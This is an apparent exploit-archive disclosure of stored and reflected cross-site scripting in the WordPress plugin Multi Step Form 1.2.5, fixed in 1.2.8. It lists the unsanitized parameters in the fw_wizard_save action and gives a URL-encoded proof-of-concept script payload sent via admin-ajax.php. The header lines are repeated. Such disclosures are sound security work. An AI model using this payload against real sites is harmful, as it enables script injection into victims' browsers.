Exploit Author: Mohammed Ansari(ansaert@gmail.com)
LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: July 27 2018
Affected Version: 1.2.5
Fixed Version: 1.2.8 Released on Aug 3 2018.
Active installations: 7,000+
Plugin: https://wordpress.org/plugins/multi-step-form/
LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: July 27 2018
Affected Version: 1.2.5
Fixed Version: 1.2.8 Released on Aug 3 2018.
Active installations: 7,000+
Plugin: https://wordpress.org/plugins/multi-step-form/
Description
Multi Step Form has a drag & drop enabled form builder for quick and intuitive creation of nice-looking multi step forms. Forms can be embedded on any page or post with short codes.Classification
Type: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')CWE: CWE-79
Proof of Concept
There is multiple stored and reflected XSS vulnerabilities in file class-mondula-multistep-forms-admin.php in fw_wizard_save action. The reason - unsanitized user's input from the following parameters:data[wizard][steps][0][title] data[wizard][steps][0][headline] data[wizard][steps][0][copy_text] data[wizard][steps][0][parts][0][title] data[wizard][steps][0][parts][0][blocks][0][label] data[wizard][steps][0][parts][0][blocks][0][format] data[wizard][steps][0][parts][0][blocks][1][label] data[wizard][steps][0][parts][0][blocks][2][label] data[wizard][steps][0][parts][0][blocks][3][label] data[wizard][settings][thankyou] |
Example:
Locate Multi step form and enter payload and Save. The values are passed via Ajax → http://localhost/word496/wp-admin/admin-ajax.php
data%5Bwizard%5D%5Btitle%5D=My+Multi+Step+Form%22%3E%3Cscript%3Ealert(22)%3B%3C%2Fscript%3E |